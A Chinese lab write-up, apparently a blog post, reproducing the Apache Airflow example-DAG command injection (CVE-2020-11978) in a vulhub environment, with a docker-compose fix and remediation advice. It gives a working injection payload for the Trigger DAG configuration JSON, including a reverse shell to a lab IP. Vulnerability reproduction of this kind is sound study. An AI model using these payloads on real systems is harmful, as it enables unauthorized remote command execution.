EVTboy_666
EVTboy_666

漏洞复现——Apache Airflow 示例dag中的命令注入(CVE-2020-11978)

菜就得多学习

环境:vulhub

Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞,未授权的访问者可以通过这个漏洞在Worker中执行任意命令。

根据vulhub文档

需要依次执行如下命令启动airflow 1.10.10:

#初始化数据库
docker-compose run airflow-init

#启动服务
docker-compose up -d

可执行的时候报错了,

The Compose file './docker-compose.yml' is invalid because: Invalid top-level property "x-airflow-common". Valid top-level sections for this Compose file are: version, services, networks, volumes, and extensions starting with "x-". You might be seeing this error because you're using the wrong Compose file version. Either specify a supported version (e.g "2.2" or "3.3") and place your service definitions under the `services` key, or omit the `version` key and place your service definitions at the root of the file to use version 1. For more on the Compose file format versions, see https://docs.docker.com/compose/compose-file/ services.airflow-init.depends_on contains an invalid type, it should be an array services.airflow-scheduler.depends_on contains an invalid type, it should be an array services.airflow-webserver.depends_on contains an invalid type, it should be an array services.airflow-worker.depends_on contains an invalid type, it should be an array services.flower.depends_on contains an invalid type, it should be an array

对docker的使用还不到能解决这个问题的程度,寻求GPT的帮助

他说:

根据错误消息,这个Compose文件似乎不符合Docker Compose的格式要求。错误消息指出了几个问题:

  1. x-airflow-common:在Docker Compose文件的顶级属性中,不允许使用名为x-airflow-common的自定义属性。合法的顶级属性包括versionservicesnetworksvolumes,以及以x-开头的扩展属性。

  2. depends_ondepends_on属性应该是一个数组,而不是一个单独的值。在指定服务依赖关系时,应该使用方括号将多个依赖项包裹起来。例如,depends_on: [redis]

针对这些问题,你可以进行以下修改:

  • 删除x-airflow-common部分,并将其中的配置内容移动到各个服务的定义中。
  • depends_on属性的值改为数组形式。

然后他给出了修改方案,

version: '3'
services:
  postgres:
    image: postgres:13-alpine
    environment:
      POSTGRES_USER: airflow
      POSTGRES_PASSWORD: airflow
      POSTGRES_DB: airflow
    healthcheck:
      test: ["CMD", "pg_isready", "-U", "airflow"]
      interval: 5s
      retries: 5

  redis:
    image: redis:5-alpine
    healthcheck:
      test: ["CMD", "redis-cli", "ping"]
      interval: 5s
      timeout: 30s
      retries: 50

  airflow-webserver:
    image: vulhub/airflow:1.10.10
    environment:
      - AIRFLOW__CORE__EXECUTOR=CeleryExecutor
      - AIRFLOW__CORE__SQL_ALCHEMY_CONN=postgresql+psycopg2://airflow:airflow@postgres/airflow
      - AIRFLOW__CELERY__RESULT_BACKEND=db+postgresql://airflow:airflow@postgres/airflow
      - AIRFLOW__CELERY__BROKER_URL=redis://:@redis:6379/0
      - AIRFLOW__CORE__FERNET_KEY=
      - AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION=true
      - AIRFLOW__CORE__LOAD_EXAMPLES=true
      - AIRFLOW__API__AUTH_BACKEND=airflow.api.auth.backend.default
    user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
    depends_on:
      - redis
      - postgres
    command: webserver
    ports:
      - 8080:8080
    healthcheck:
      test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
      interval: 10s
      timeout: 10s
      retries: 5

  airflow-scheduler:
    image: vulhub/airflow:1.10.10
    environment:
      - AIRFLOW__CORE__EXECUTOR=CeleryExecutor
      - AIRFLOW__CORE__SQL_ALCHEMY_CONN=postgresql+psycopg2://airflow:airflow@postgres/airflow
      - AIRFLOW__CELERY__RESULT_BACKEND=db+postgresql://airflow:airflow@postgres/airflow
      - AIRFLOW__CELERY__BROKER_URL=redis://:@redis:6379/0
      - AIRFLOW__CORE__FERNET_KEY=
      - AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION=true
      - AIRFLOW__CORE__LOAD_EXAMPLES=true
      - AIRFLOW__API__AUTH_BACKEND=airflow.api.auth.backend.default
    user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
    depends_on:
      - redis
      - postgres
    command: scheduler
    healthcheck:
      test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"']
      interval: 10s
      timeout: 10s
      retries: 5

  airflow-worker:
    image: vulhub/airflow:1.10.10
    environment:
      - AIRFLOW__CORE__EXECUTOR=CeleryExecutor
      - AIRFLOW__CORE__SQL_ALCHEMY_CONN=postgresql+psycopg2://airflow:airflow@postgres/airflow
      - AIRFLOW__CELERY__RESULT_BACKEND=db+postgresql://airflow:airflow@postgres/airflow
      - AIRFLOW__CELERY__BROKER_URL=redis://:@redis:6379/0
      - AIRFLOW__CORE__FERNET_KEY=
      - AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION=true
      - AIRFLOW__CORE__LOAD_EXAMPLES=true
      - AIRFLOW__API__AUTH_BACKEND=airflow.api.auth.backend.default
    user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
    depends_on:
      - redis
      - postgres
    command: worker
    healthcheck:
      test:
        - "CMD-SHELL"
        - 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"'
      interval: 10s
      timeout: 10s
      retries: 5

  airflow-init:
    image: vulhub/airflow:1.10.10
    environment:
      - AIRFLOW__CORE__EXECUTOR=CeleryExecutor
      - AIRFLOW__CORE__SQL_ALCHEMY_CONN=postgresql+psycopg2://airflow:airflow@postgres/airflow
      - AIRFLOW__CELERY__RESULT_BACKEND=db+postgresql://airflow:airflow@postgres/airflow
      - AIRFLOW__CELERY__BROKER_URL=redis://:@redis:6379/0
      - AIRFLOW__CORE__FERNET_KEY=
      - AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION=true
      - AIRFLOW__CORE__LOAD_EXAMPLES=true
      - AIRFLOW__API__AUTH_BACKEND=airflow.api.auth.backend.default
      - _AIRFLOW_DB_UPGRADE=true
    user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
    depends_on:
      - redis
      - postgres
    command: initdb

  flower:
    image: vulhub/airflow:1.10.10
    environment:
      - AIRFLOW__CORE__EXECUTOR=CeleryExecutor
      - AIRFLOW__CORE__SQL_ALCHEMY_CONN=postgresql+psycopg2://airflow:airflow@postgres/airflow
      - AIRFLOW__CELERY__RESULT_BACKEND=db+postgresql://airflow:airflow@postgres/airflow
      - AIRFLOW__CELERY__BROKER_URL=redis://:@redis:6379/0
      - AIRFLOW__CORE__FERNET_KEY=
      - AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION=true
      - AIRFLOW__CORE__LOAD_EXAMPLES=true
      - AIRFLOW__API__AUTH_BACKEND=airflow.api.auth.backend.default
    user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
    depends_on:
      - redis
      - postgres
    command: flower
    ports:
      - 5555:5555
    healthcheck:
      test: ["CMD", "curl", "--fail", "http://localhost:5555/"]
      interval: 10s
      timeout: 10s
      retries: 5

 将docker-compose.yml的内容替换后就成功运行 

然后作者回复说升级docker-compose版本,或者直接使用docker compose来执行指定命令。

 我的docker-compose版本是1.25.0,原来不用这么麻烦,我用高版本跑的十分流畅……

 

为避免此类小尴尬,得继续学习docker……

访问http://your-ip:8080进入airflow管理端,将example_trigger_target_dag前面的Off改为On:

漏洞复现——Apache Airflow 示例dag中的命令注入(CVE-2020-11978)_第1张图片

 点击example_trigger_target_dag,进入页面,点击Trigger DAG,进入到调试页面。

漏洞复现——Apache Airflow 示例dag中的命令注入(CVE-2020-11978)_第2张图片

Configuration JSON中输入需要执行的命令:

{"message":"'\";你的命令;#"}

我直接就是一个反弹shell

{"message":"'\";sh -i >& /dev/tcp/192.168.110.12/6666 0>&1;#"}

漏洞复现——Apache Airflow 示例dag中的命令注入(CVE-2020-11978)_第3张图片

修复建议

升级至1.10.10版本以上,删除或禁用默认DAG(删除或在配置文件中禁用默认DAGload_examples=False)

参考学习:

Vulhub - Docker-Compose file for vulnerability environment

你可能感兴趣的:(网络安全,安全)

  • 调用wx.openDocument,文件或文件夹不在白名单中, 上传时会被忽略, 在真机上可能无法读取 黑云压城After 微信uni-app前端微信小程序
    1.这个问题可能是由于微信小程序的安全策略导致的。微信小程序对于网络请求和文件读取都有一些限制,其中包括白名单机制。如果你的小程序中的文件不在白名单中,那么在真机上可能无法读取。怎么解决这个问题,我们先使用uni.downloadFile把后台接口或者本地的PDF以及其他格式转为获取到本地临时路径。然后再使用uni.openDocument就可以了。[代码]复制就能用。Click(){//this
  • MarsCode算法题之补给站最优花费问题 xiao--xin 豆包MarsCode算法题算法java动态规划MarsCode
    1.问题描述小U计划进行一场从地点A到地点B的徒步旅行,旅行总共需要M天。为了在旅途中确保安全,小U每天都需要消耗一份食物。在路程中,小U会经过一些补给站,这些补给站分布在不同的天数上,且每个补给站的食物价格各不相同。小U需要在这些补给站中购买食物,以确保每天都有足够的食物。现在她想知道,如何规划在不同补给站的购买策略,以使她能够花费最少的钱顺利完成这次旅行。M:总路程所需的天数。N:路上补给站的
  • 云服务器拖拽文件,快捷拖动文件到远程服务器 weixin_39631370 云服务器拖拽文件
    快捷拖动文件到远程服务器内容精选换一换远程桌面协议(RemoteDesktopProtocol,RDP),是微软提供的多通道的远程登录协议。本节为您介绍如何使用RDP文件远程登录Windows云服务器。从管理控制台下载的RDP文件对应唯一的云服务器,当前RDP文件命名规则为“云服务器名称-弹性IP”。云服务器状态为“运行中”。云服务器已经绑定弹性公网IP。所在安全组入方向远程连接Linux云服务器
  • MySQL存储引擎 JustGopher MySQL数据库mysql数据库
    MySQL体系结构连接层最上层是一些客户端和连接服务,主要完成一些类似于连接处理、授权认证、及相关的安全方案。服务器也会为每个安全接入的用户端验证它所具有的操作权限。服务层第二层架构主要完成大多数的核心服务功能,如SQL接口,并完成缓存的查询,SQL的分析和优化、部分内置函数的执行。所有跨存储引擎的功能也在这一层实现,如:过程、函数等。引擎层存储引擎真正的负责了MySQL中数据的存储和提取,服务器
  • 第30篇:Python开发进阶:网络安全与测试 猿享天开 python从入门到精通pythonweb安全开发语言
    第30篇:网络安全与测试目录网络安全概述什么是网络安全常见的安全威胁Python中的网络安全工具常用安全库介绍安全编码实践密码学基础加密与解密哈希函数数字签名安全认证与授权用户认证访问控制OAuth与JWTWeb应用安全常见的Web安全漏洞防护措施安全测试网络安全测试渗透测试自动化测试工具安全漏洞扫描使用Python进行安全测试使用Scapy进行网络嗅探使用Requests进行安全测试使用Beau
  • 麒麟 V10(ky10.x86_64)无网环境下 openssl - 3.2.2 与 openssh - 9.8p1 升级【最全教程】 寒冰碧海 Linux服务器运维指南安全linux运维服务器网络
    目录背景安装包下载上传解压安装包安装zlib安装OpenSSL安装OpenSSH验证背景近期,项目上线已进入倒计时阶段,然而在至关重要的安全检查环节中,却惊现现有的OpenSSH存在一系列令人担忧的漏洞:OpenSSH资源管理错误漏洞(CVE-2021-28041)OpenSSH信息泄露漏洞(CVE-2020-14145)OpenSSH输入验证错误漏洞(CVE-2020-12062)OpenSSH
  • 主流包管理工具npm、yarn、cnpm、pnpm之间的区别与联系——原理篇 2401_84091628 程序员npm前端node.js
    }解析,^字符,告诉npm,安装主版本等于4的任意一个版本即可现在运行npm进行安装,npm将安装lodash的主版本为4的最新版,可能是[email protected](@是npm约定用来确定包名的指定版本的)理论上,次版本号的变化并不会影响向后兼容性。因此,安装最新版的依赖库应该是能正常工作的,而且能引入自4.17.4版本以后的重要错误和安全方面的修复。但是,即使不同的开发人员使用了相同的packa
  • 使用Python和Flask搭建导航网站需要注意的问题有哪些? 大懒猫软件 pythonflask开发语言
    使用Python和Flask搭建导航网站时,需要注意以下几个关键问题,以确保网站的性能、安全性和可维护性。以下是一些常见问题和建议:1.性能优化静态文件缓存:确保静态文件(如CSS、JavaScript、图片)被浏览器缓存,减少重复请求。在Nginx中配置缓存头:nginx复制location~*\.(css|js|jpg|jpeg|png|gif)${expires1d;#设置缓存有效期为1天}
  • 终于把前后端sm加解密以及加签验证调通了。 清风孤客 前端javascriptspringjavaspringboot
    终于把前后端sm加解密以及加签验证调通了!领导要求我对项目的数据传输安全考虑下,因此就想到了对敏感字段做加密和对请求、响应做数字签名验证。网上看了很多文章,可能是因为我对加密这块不了解,感觉都比较乱。所以前前后后花了4天才把前后端调通。特地写一篇文章记录下流程。这里使用的是sm国密算法。不对的地方请读者评论指出。1.简单说明:前端使用sm-crypto库后端加密库使用bc库,架构上使用aop,注解
  • Web接口加密解密以及加签验证介绍 清风孤客 服务器网络运维
    在Web接口中,为了保护数据传输的安全性和完整性,可以使用加签和加密的方式进行保护。加签:加签是指在请求参数中添加签名信息,以验证请求的真实性和完整性。具体的步骤如下:定义一个密钥,用于生成签名和验证签名。将请求的参数按照一定的规则进行排序和拼接,生成一个字符串。使用密钥对生成的字符串进行加密,得到签名。将签名添加到请求参数中,发送请求。在服务端,对收到的请求参数按照同样的规则进行排序和拼接,再次
  • Linux: Apache 安全设定 iteye_5904 Ubuntu/Mac/Github/Aptana/Nginx/Shell/Linux数据库操作系统系统安全
    1.AutoIndex预设安装好Apache之后,其预设目录是在/var/www/html/,如果没有设定index.html的话,那么就会印出目前目录里的所有档案和目录,基於安全理由,希望把AutoIndex这个取消,如此在别人打入网址后,就会出现403的存取权限不足,只有在很“明确”的指出档案时才可以浏览。关闭/var/www/html里(含子目录)的自动印出首页功能[root@rhelcon
  • 网络安全(黑客)——自学2025 网安大师兄 web安全安全网络网络安全linux
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习
  • 嵌入式Rust小探 weixin_40437029 rust
    说明现在很多项目都在从C++/C迁移到Rust,这是一种内存管理更安全的语言,从根本上可以防止一些指针操作的问题既然如此,那我们也尝试一下如何在嵌入式开发当中使用Rust,然后再慢慢迁移到更多代码https://doc.rust-lang.org/reference/introduction.htmlhttps://zhuanlan.zhihu.com/p/628575325https://www
  • 安全威胁情报简述 安全大哥 威胁情报安全网络
    什么是安全情报?从情报的类型上来看可以分为:资产情报、事件情报、漏洞情报和威胁情报。注意,我们常说的威胁情报,并不完全等同于安全情报。四大类信息[2]资产情报:主要用于确认企业自身的资产e.g.企业自身的数据SOC、SIEM数据日志、告警等。资产情报如何搜集?主要来自于企业的SOC(SecurityOperationCenter),SIEM(SecurityInformationandEventM
  • HTTPS安全版预告页面设计与实施指南 魔都财观
    本文还有配套的精品资源,点击获取简介:本文深入探讨了网站即将上线时,如何使用HTTPS协议创建一个安全且吸引人的预告页面。HTTPS是HTTP的安全版本,利用SSL/TLS协议提供数据加密、身份验证和数据完整性,对于保护用户隐私和提升网站信任度至关重要。文章详细阐述了构建预告页面时所需的基础HTML、CSS和JavaScript技术,并且讨论了如何配置HTTPS以及进行测试和SEO优化的重要性。1
  • 什么是安全情报? huaqiwangan 安全
    一、从情报的类型上来看可以分为:资产情报、事件情报、漏洞情报和威胁情报。注意,我们常说的威胁情报,并不完全等同于安全情报。四大类信息1.资产情报:主要用于确认企业自身的资产e.g.企业自身的数据SOC、SIEM数据日志、告警等。资产情报如何搜集?主要来自于企业的SOC(SecurityOperationCenter),SIEM(SecurityInformationandEventManageme
  • 终于明白什么是威胁情报 国安护卫 信息安全威胁情报
    威胁情报初探什么是威胁情报,其实安全圈一直在使用着它们,漏洞库、指纹库、IP信誉库,它们都是威胁情报的一部分。情报就是线索,威胁情报就是为了还原已发生的攻击和预测未发生的攻击所需要的一切线索。“所谓的威胁情报就是帮助我们发现威胁,并进行处置的相应知识。这种知识就是我们所说的威胁情报”。威胁情报有啥用?互联网安全曾经历经了流氓互殴,侠客对决、黑社会火并等等阶段,现在已经形成了攻击者有组织有预谋,防御
  • RiskCloud-基于Markov算法精准的FTA、 JSA、FMEA软件 资讯过客视点 算法
    这个美美的“花蝴蝶”是什么?样式规整、图案美化、脉络清晰、让人眼前一亮!由上海歌略软件科技有限公司自主研发打造,RiskCloud世界领先的企业级整体风险管理解决方案大作!“BowTie领结图”接下来,就让我们携手一起走进RiskCloud-BowTie领结图,一起领略她的风采吧!风险管理领结图介绍20世纪90年代末,领结图作为一种独特的安全管理工具,开始在国外石油化工领域得到较为广泛的应用。基于
  • 补齐漏洞/补天漏洞挖掘-零开始攻防自学 黑客小媚子 漏洞情报补天
    补齐漏洞/补天漏洞挖掘-零开始攻防自学不久前,补天漏洞响应平台宣布,推出了全新的补天漏洞情报服务,将发动补天平台已注册的36000多名白帽子提供漏洞信息,经过安全专家分析研判脱敏处理后,加工成漏洞情报推送给行业客户。补天掌门人白健在接受雷锋网在内的媒体采访时表示,除了BAT级的大厂有钱有人专门建立自己的SRC外,他认为,其他厂商不应该耗费大量财力和人力来构建专门的漏洞情报搜集和分析部门。为什么补天
  • SpringCloud系列教程:微服务的未来(十七)监听Nacos配置变更、更新路由、实现动态路由 程序猿零零漆 SpringCloud专栏springcloud微服务java
    前言在微服务架构中,API网关是各个服务之间的入口点,承担着路由、负载均衡、安全认证等重要功能。为了实现动态的路由配置管理,通常需要通过中心化的配置管理系统来实现灵活的路由更新,而无需重启网关服务。Nacos作为一个开源的动态服务发现与配置管理平台,可以方便地实现这一目标。本文将介绍如何利用Nacos配置中心来动态更新SpringCloudGateway的路由配置,确保路由信息的实时更新,并提升系
  • 面试经验分享 | 杭州某安全大厂渗透测试岗二面 黑客老李 面试经验分享安全服务器大数据数据库职场和发展
    更多大厂面试经验的视频分享看主页目录:所面试的公司:某安全大厂所在城市:杭州面试职位:渗透测试工程师面试过程:面试官的问题:1、问了我最近在做什么,学什么方向的东西?2、问了我简历上面写着有过培训经历,问我有过哪方面的培训?3、问对Windows和linux系统了解多少?4、windows和linux查看计划任务⽤那些命令?5、Linux后台有⼀个进程,你需要找到他的程序执⾏⽂件,该怎么找?6、在
  • 面试经验分享 | 杭州某安全大厂渗透测试岗 黑客老李 面试经验分享安全服务器运维职场和发展python
    更多大厂面试经验的视频经验分享看主页目录:所面试的公司:某安全大厂所在城市:杭州面试职位:渗透测试工程师面试过程:面试官的问题:1、面试官开始就问了我,为什么要学网络安全?2、什么是sql注⼊3、关于sql注⼊,都分为那些?4、如果在实战中遇到了防护,⽐如sql注⼊过滤掉了空格怎么办?5、什么是csrf?6、简单讲解下内存⻢?7、讲下内存⻢排查思路?8、平常有对APP、小程序渗透测试吗?9、你是用
  • 我们为什么要用大语言模型来迭代数据安全能力? 大模型. 语言模型人工智能自然语言处理架构深度学习大数据大模型
    在当今科技飞速发展的时代,大语言模型无疑是最炙手可热的话题之一。从OpenAI的GPT系列到谷歌的BERT,这些拥有海量参数的模型宛如智能巨人,正重塑着自然语言处理(NLP)的格局。你或许好奇,大语言模型究竟为何如此备受瞩目?这得从自然语言处理领域的核心任务——文本分类说起。文本分类,就像是给五花八门的文本信息贴上合适的“标签”,无论是判断一封邮件是正常邮件还是垃圾邮件,分析社交媒体上的评论是积极
  • 从腾讯云数据仓库TCHouse安全地转移数据到AWS Redshift weixin_30777913 数据仓库腾讯云云计算pythonaws
    实现从AWSDirectConnect连接到腾讯云数据仓库TCHouse-P、TCHouse-C或TCHouse-D,然后使用AWSGlue读取数据并在AWSRedshift中创建对应表并复制数据,需要按照以下步骤进行操作:网络连接设置AWSDirectConnect配置:在AWS管理控制台中,创建一个DirectConnect连接到你的本地网络或腾讯云所在的网络环境。配置虚拟接口(VIF),确保
  • ORACLE parameter zhangtian0913 oracle数据库usersession存储integer
    一、用户的概念用户,即user,通俗的讲就是访问oracle数据库的“人”。在oracle中,可以对用户的各种安全参数进行控制,以维护数据库的安全性,这些概念包括模式(schema)、权限、角色、存储设置、空间限额、存取资源限制、数据库审计等。每个用户都有一个口令,使用正确的用户/口令才能登录到数据库进行数据存取。二、用户默认表空间表空间是信息存储的最大逻辑单位、当用户连接到数据库进行资料存储时,
  • 网络安全在线网站/靶场:全面探索与实践 小熊同学哦 网络安全web安全安全网络网络安全系统安全计算机网络
    目录1.CyberPatriot简介功能与特点适用人群2.HackTheBox简介功能与特点适用人群3.OverTheWire简介功能与特点适用人群4.VulnHub简介功能与特点适用人群5.PortSwiggerWebSecurityAcademy简介功能与特点适用人群6.TryHackMe简介功能与特点适用人群7.CTFTime简介功能与特点适用人群8.WebGoat简介功能与特点适用人群结论
  • SSH隧道连接(基于linux) 小熊同学哦 网络安全sshlinux运维
    引言SecureShell(SSH)是一种网络协议,用于在不安全的网络中为网络服务提供安全的传输。SSH协议主要用来进行远程登录,管理服务器,传输文件等。本文将详细介绍SSH的工作原理、配置方法以及常见问题的解决方法,帮助读者更好地理解和使用SSH。1.SSH的基本概念1.1什么是SSH?SSH(SecureShell)是一种加密的网络协议,用于安全地连接到远程计算机。它提供了安全的通信通道,可以
  • Java实现文件内容加解密 qq_34759280 Javajava安全加解密
    背景近期在做一个对数据安全要求比较高的软件,用户要求做到对接口、文件、以及数据库部分敏感字段进行加密。由于系统中文件内容比较敏感,用户要求除了客户其他人不能查看文件具体内容,包括运维人员和开发人员。探讨其实文件加密并不算太复杂。无非就是在用户上传文件的时候将文件内容读出加密写入后再存到服务器,然后用户下载的时候将内容读出然后解密再写入输出流即可。简单实现计算机数据内容是二进制,针对二进制最简单高效
  • 电商数据隐私与合规性:API接口的安全挑战 FBAPI3713612741 大数据python爬虫oneapi人工智能
    随着互联网技术的不断发展和普及,电商行业迎来了高速增长的时代。电商网站作为电商运营与交互的核心平台,承载了大量用户数据,包括个人信息、消费记录、点击数据等。这些用户数据不仅是电商网站运营的重要基础和竞争优势,同时也涉及到用户的隐私权益和信息安全问题。API(应用程序编程接口)接口作为独立站与外部系统交互的门户,不仅关乎数据的保密性、完整性和可用性,还直接影响到用户的隐私保护、企业的声誉以及业务的可
  • 数字时代信息安全的关键之道—零信任架构 AZone架构院 架构
    随着数字化转型的迅猛推进,信息安全面临的挑战也日益复杂和严峻。传统的网络边界已经逐渐模糊,企业数据流动的复杂性和敏感性也随之增加。在此背景下,零信任架构(ZeroTrustArchitecture,ZTA)应运而生,成为保护企业数字资产的首选策略。TheOpenGroup发布了《零信任的核心原则》,详细阐述了零信任架构的核心原则、应用场景以及技术实现,为企业提供了全面的参考指南。01零信任架构的核
  • 312个免费高速HTTP代理IP(能隐藏自己真实IP地址) yangshangchuan 高速免费superwordHTTP代理
        124.88.67.20:843 190.36.223.93:8080 117.147.221.38:8123 122.228.92.103:3128 183.247.211.159:8123 124.88.67.35:81 112.18.51.167:8123 218.28.96.39:3128 49.94.160.198:3128 183.20
  • pull解析和json编码 百合不是茶 androidpull解析json
    n.json文件: [{name:java,lan:c++,age:17},{name:android,lan:java,age:8}]   pull.xml文件 <?xml version="1.0" encoding="utf-8"?> <stu>     <name>java
  • [能源与矿产]石油与地球生态系统 comsci 能源
          按照苏联的科学界的说法,石油并非是远古的生物残骸的演变产物,而是一种可以由某些特殊地质结构和物理条件生产出来的东西,也就是说,石油是可以自增长的....       那么我们做一个猜想: 石油好像是地球的体液,我们地球具有自动产生石油的某种机制,只要我们不过量开采石油,并保护好
  • 类与对象浅谈 沐刃青蛟 java基础
           类,字面理解,便是同一种事物的总称,比如人类,是对世界上所有人的一个总称。而对象,便是类的具体化,实例化,是一个具体事物,比如张飞这个人,就是人类的一个对象。但要注意的是:张飞这个人是对象,而不是张飞,张飞只是他这个人的名字,是他的属性而已。而一个类中包含了属性和方法这两兄弟,他们分别用来描述对象的行为和性质(感觉应该是
  • 新站开始被收录后,我们应该做什么? IT独行者 PHPseo
    新站开始被收录后,我们应该做什么?         百度终于开始收录自己的网站了,作为站长,你是不是觉得那一刻很有成就感呢,同时,你是不是又很茫然,不知道下一步该做什么了?至少我当初就是这样,在这里和大家一份分享一下新站收录后,我们要做哪些工作。       至于如何让百度快速收录自己的网站,可以参考我之前的帖子《新站让百
  • oracle 连接碰到的问题 文强chu oracle
    Unable to find a java Virtual Machine--安装64位版Oracle11gR2后无法启动SQLDeveloper的解决方案 作者:草根IT网 来源:未知 人气:813标签: 导读:安装64位版Oracle11gR2后发现启动SQLDeveloper时弹出配置java.exe的路径,找到Oracle自带java.exe后产生的路径“C:\app\用户名\prod
  • Swing中按ctrl键同时移动鼠标拖动组件(类中多借口共享同一数据) 小桔子 java继承swing接口监听
            都知道java中类只能单继承,但可以实现多个接口,但我发现实现多个接口之后,多个接口却不能共享同一个数据,应用开发中想实现:当用户按着ctrl键时,可以用鼠标点击拖动组件,比如说文本框。 编写一个监听实现KeyListener,NouseListener,MouseMotionListener三个接口,重写方法。定义一个全局变量boolea
  • linux常用的命令 aichenglong linux常用命令
    1 startx切换到图形化界面 2 man命令:查看帮助信息 man 需要查看的命令,man命令提供了大量的帮助信息,一般可以分成4个部分 name:对命令的简单说明 synopsis:命令的使用格式说明 description:命令的详细说明信息 options:命令的各项说明 3 date:显示时间 语法:date [OPTION]... [+FORMAT]
  • eclipse内存优化 AILIKES javaeclipsejvmjdk
    一 基本说明      在JVM中,总体上分2块内存区,默认空余堆内存小于 40%时,JVM就会增大堆直到-Xmx的最大限制;空余堆内存大于70%时,JVM会减少堆直到-Xms的最小限制。     1)堆内存(Heap memory):堆是运行时数据区域,所有类实例和数组的内存均从此处分配,是Java代码可及的内存,是留给开发人
  • 关键字的使用探讨 百合不是茶 关键字
    //关键字的使用探讨/*访问关键词private 只能在本类中访问public 只能在本工程中访问protected 只能在包中和子类中访问默认的 只能在包中访问*//*final   类 方法 变量 final 类 不能被继承 final 方法 不能被子类覆盖,但可以继承 final 变量 只能有一次赋值,赋值后不能改变 final 不能用来修饰构造方法*///this()
  • JS中定义对象的几种方式 bijian1013 js
        1. 基于已有对象扩充其对象和方法(只适合于临时的生成一个对象): <html> <head> <title>基于已有对象扩充其对象和方法(只适合于临时的生成一个对象)</title> </head> <script> var obj = new Object();
  • 表驱动法实例 bijian1013 java表驱动法TDD
    获得月的天数是典型的直接访问驱动表方式的实例,下面我们来展示一下: MonthDaysTest.java package com.study.test; import org.junit.Assert; import org.junit.Test; import com.study.MonthDays; public class MonthDaysTest { @T
  • LInux启停重启常用服务器的脚本 bit1129 linux
    启动,停止和重启常用服务器的Bash脚本,对于每个服务器,需要根据实际的安装路径做相应的修改   #! /bin/bash Servers=(Apache2, Nginx, Resin, Tomcat, Couchbase, SVN, ActiveMQ, Mongo); Ops=(Start, Stop, Restart); currentDir=$(pwd); echo
  • 【HBase六】REST操作HBase bit1129 hbase
    HBase提供了REST风格的服务方便查看HBase集群的信息,以及执行增删改查操作   1. 启动和停止HBase REST 服务 1.1 启动REST服务 前台启动(默认端口号8080) [hadoop@hadoop bin]$ ./hbase rest start   后台启动 hbase-daemon.sh start rest   启动时指定
  • 大话zabbix 3.0设计假设 ronin47
    What’s new in Zabbix 2.0? 去年开始使用Zabbix的时候,是1.8.X的版本,今年Zabbix已经跨入了2.0的时代。看了2.0的release notes,和performance相关的有下面几个:          :: Performance improvements::Trigger related da
  • http错误码大全 byalias http协议javaweb
    响应码由三位十进制数字组成,它们出现在由HTTP服务器发送的响应的第一行。 响应码分五种类型,由它们的第一位数字表示: 1)1xx:信息,请求收到,继续处理 2)2xx:成功,行为被成功地接受、理解和采纳 3)3xx:重定向,为了完成请求,必须进一步执行的动作 4)4xx:客户端错误,请求包含语法错误或者请求无法实现 5)5xx:服务器错误,服务器不能实现一种明显无效的请求
  • J2EE设计模式-Intercepting Filter bylijinnan java设计模式数据结构
    Intercepting Filter类似于职责链模式 有两种实现 其中一种是Filter之间没有联系,全部Filter都存放在FilterChain中,由FilterChain来有序或无序地把把所有Filter调用一遍。没有用到链表这种数据结构。示例如下: package com.ljn.filter.custom; import java.util.ArrayList;
  • 修改jboss端口 chicony jboss
    修改jboss端口   %JBOSS_HOME%\server\{服务实例名}\conf\bindingservice.beans\META-INF\bindings-jboss-beans.xml   中找到 <!-- The ports-default bindings are obtained by taking the base bindin
  • c++ 用类模版实现数组类 CrazyMizzz C++
    最近c++学到数组类,写了代码将他实现,基本具有vector类的功能 #include<iostream> #include<string> #include<cassert> using namespace std; template<class T> class Array { public: //构造函数
  • hadoop dfs.datanode.du.reserved 预留空间配置方法 daizj hadoop预留空间
    对于datanode配置预留空间的方法 为:在hdfs-site.xml添加如下配置  <property>     <name>dfs.datanode.du.reserved</name>     <value>10737418240</value>    
  • mysql远程访问的设置 dcj3sjt126com mysql防火墙
    第一步: 激活网络设置 你需要编辑mysql配置文件my.cnf. 通常状况,my.cnf放置于在以下目录: /etc/mysql/my.cnf (Debian linux) /etc/my.cnf (Red Hat Linux/Fedora Linux) /var/db/mysql/my.cnf (FreeBSD) 然后用vi编辑my.cnf,修改内容从以下行: [mysqld] 你所需要: 1
  • ios 使用特定的popToViewController返回到相应的Controller dcj3sjt126com controller
    1、取navigationCtroller中的Controllers NSArray * ctrlArray = self.navigationController.viewControllers; 2、取出后,执行, [self.navigationController popToViewController:[ctrlArray objectAtIndex:0] animated:YES
  • Linux正则表达式和通配符的区别 eksliang 正则表达式通配符和正则表达式的区别通配符
    转载请出自出处:http://eksliang.iteye.com/blog/1976579 首先得明白二者是截然不同的 通配符只能用在shell命令中,用来处理字符串的的匹配。 判断一个命令是否为bash shell(linux 默认的shell)的内置命令 type -t commad 返回结果含义 file  表示为外部命令 alias  表示该
  • Ubuntu Mysql Install and CONF gengzg Install
    http://www.navicat.com.cn/download/navicat-for-mysql Step1: 下载Navicat ,网址:http://www.navicat.com/en/download/download.html Step2:进入下载目录,解压压缩包:tar -zxvf navicat11_mysql_en.tar.gz
  • 批处理,删除文件bat huqiji windowsdos
